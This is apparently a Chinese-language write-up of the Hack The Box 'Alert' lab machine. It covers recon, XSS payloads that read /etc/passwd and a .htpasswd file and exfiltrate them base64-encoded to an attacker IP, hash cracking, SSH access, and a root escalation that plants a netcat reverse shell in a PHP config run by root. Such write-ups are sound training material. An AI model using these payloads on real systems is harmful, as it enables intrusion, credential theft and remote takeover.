Linux渗透实战：通过XSS建立立足点并提权<\/h1>

靶机概述<\/h2>
本次实战的目标是HTB平台的Alert靶机，难度评级为Easy但实际接近中等难度。主要技术点包括：<\/p>
通过XSS漏洞读取敏感文件<\/li>
获取凭据后SSH登录<\/li>
使用pspy监控进程发现提权路径<\/li>
通过修改PHP配置文件获取root权限<\/li> <\/ul>
信息收集阶段<\/h2>

端口扫描<\/h3>
使用nmap进行全端口扫描：<\/p>
nmap -sT --min-rate 10000<\/span> -p- 10.10.11.44
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp (SSH)<\/li>
80\/tcp (HTTP)<\/li>
<\/ul>
详细扫描：<\/p>
nmap -sTVC -O -p22,80 10.10.11.44
<\/span><\/span><\/code><\/pre>结果：<\/p>

SSH服务：OpenSSH 8.2p1 Ubuntu<\/li>
HTTP服务：Apache httpd 2.4.41<\/li>
网站标题：Alert - Markdown Viewer<\/li>
请求的资源：index.php?page=alert<\/li>
<\/ul>
目录爆破<\/h3>
使用gobuster进行目录枚举：<\/p>
gobuster dir -w \/usr\/share\/dirbuster\/wordlists\/directory-list-lowercase-2.3-medium.txt -u http:\/\/alert.htb -x php,.txt
<\/span><\/span><\/code><\/pre>发现重要文件：<\/p>

messages.php<\/li>
<\/ul>
子域名爆破<\/h3>
使用ffuf进行子域名枚举：<\/p>
ffuf -c -w \/usr\/share\/wordlists\/amass\/subdomains-top1mil-110000.txt -u 'http:\/\/alert.htb'<\/span> -H "Host:FUZZ.alert.htb"<\/span> -fw 20<\/span>
<\/span><\/span><\/code><\/pre>发现子域名：<\/p>

statistics.alert.htb（登录界面）<\/li>
<\/ul>
漏洞利用阶段<\/h2>
XSS漏洞发现<\/h3>
在Markdown提交界面测试XSS：<\/p>
<script<\/span>>alert<\/span>('hello'<\/span>)<\/script<\/span>>
<\/span><\/span><\/code><\/pre>确认存在XSS漏洞。<\/p>
利用XSS读取文件<\/h3>
使用fetch API读取index.php：<\/p>
<script<\/span>>
<\/span><\/span>window.onload<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    fetch<\/span>("http:\/\/alert.htb\/index.php"<\/span>)
<\/span><\/span>    .then<\/span>(resp<\/span> => resp<\/span>.text<\/span>())
<\/span><\/span>    .then<\/span>(text<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?text=<\/span>${<\/span>btoa<\/span>(text<\/span>)}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>    .catch<\/span>(err<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?err=<\/span>${<\/span>err<\/span>}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>成功读取后base64解码获取文件内容。<\/p>
读取messages.php<\/h3>
尝试读取messages.php：<\/p>
<script<\/span>>
<\/span><\/span>window.onload<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    fetch<\/span>("http:\/\/alert.htb\/messages.php"<\/span>)
<\/span><\/span>    .then<\/span>(resp<\/span> => resp<\/span>.text<\/span>())
<\/span><\/span>    .then<\/span>(text<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?text=<\/span>${<\/span>btoa<\/span>(text<\/span>)}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>    .catch<\/span>(err<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?err=<\/span>${<\/span>err<\/span>}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>发现messages.php接受file参数，尝试读取\/etc\/passwd：<\/p>
<script<\/span>>
<\/span><\/span>window.onload<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    fetch<\/span>("http:\/\/alert.htb\/messages.php?file=etc\/passwd"<\/span>)
<\/span><\/span>    .then<\/span>(resp<\/span> => resp<\/span>.text<\/span>())
<\/span><\/span>    .then<\/span>(text<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?text=<\/span>${<\/span>btoa<\/span>(text<\/span>)}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>    .catch<\/span>(err<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?err=<\/span>${<\/span>err<\/span>}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>发现用户：<\/p>

albert<\/li>
david<\/li>
<\/ul>
读取.htpasswd文件<\/h3>
尝试读取子域名的认证文件：<\/p>
<script<\/span>>
<\/span><\/span>window.onload<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    fetch<\/span>("http:\/\/alert.htb\/messages.php?file=\/var\/www\/statistics.alert.htb\/.htpasswd"<\/span>)
<\/span><\/span>    .then<\/span>(resp<\/span> => resp<\/span>.text<\/span>())
<\/span><\/span>    .then<\/span>(text<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?text=<\/span>${<\/span>btoa<\/span>(text<\/span>)}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>    .catch<\/span>(err<\/span> => {
<\/span><\/span>        fetch<\/span>(`http:\/\/10.10.16.41:8899\/?err=<\/span>${<\/span>err<\/span>}<\/span>`<\/span>)
<\/span><\/span>    })
<\/span><\/span>}
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre>使用John the Ripper破解哈希：<\/p>
john --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt hash.txt
<\/span><\/span><\/code><\/pre>获得凭据：<\/p>

用户名：albert<\/li>
密码：manchesterunited<\/li>
<\/ul>
权限提升阶段<\/h2>
SSH登录<\/h3>
使用获取的凭据登录：<\/p>
ssh albert@alert.htb
<\/span><\/span><\/code><\/pre>发现内部服务<\/h3>
检查网络连接：<\/p>
ss -tuln
<\/span><\/span><\/code><\/pre>发现8080端口运行着内部服务。<\/p>
设置SSH端口转发：<\/p>
ssh albert@alert.htb -L 0.0.0.0:8080:localhost:8080
<\/span><\/span><\/code><\/pre>访问后发现是监控界面。<\/p>
使用pspy监控进程<\/h3>
下载pspy：<\/p>
wget https:\/\/github.com\/DominicBreuker\/pspy\/releases\/download\/v1.2.0\/pspy64
<\/span><\/span>chmod +x pspy64
<\/span><\/span>.\/pspy64
<\/span><\/span><\/code><\/pre>发现root运行的进程：<\/p>
CMD: UID=0 PID=32814 | \/usr\/bin\/php -f \/opt\/website-monitor\/config\/configuration.php
<\/code><\/pre>
提权利用<\/h3>
当前用户属于management组，可以修改配置文件。<\/p>
创建PHP反弹shell：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>system<\/span>("rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f |\/bin\/bash -i 2>&1 | nc 10.10.16.41 7878 >\/tmp\/f"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>写入到配置文件中：<\/p>
echo '<?php system("rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f |\/bin\/bash -i 2>&1 | nc 10.10.16.41 7878 >\/tmp\/f");?>'<\/span> > \/opt\/website-monitor\/config\/configuration.php
<\/span><\/span><\/code><\/pre>设置监听：<\/p>
nc -lvnp 7878<\/span>
<\/span><\/span><\/code><\/pre>等待root进程执行后获取root shell。<\/p>
总结<\/h2>
本靶机渗透流程：<\/p>

发现XSS漏洞<\/li>
利用XSS读取敏感文件<\/li>
获取.htpasswd并破解凭据<\/li>
SSH登录后使用pspy发现提权路径<\/li>
通过修改PHP配置文件获取root权限<\/li>
<\/ol>
关键点：<\/p>

XSS不只是用于盗取cookie，还可以用于读取文件<\/li>
子域名枚举是重要步骤<\/li>
pspy是Linux提权的重要工具<\/li>
监控root运行的定时任务或进程是常见提权方法<\/li>
<\/ul>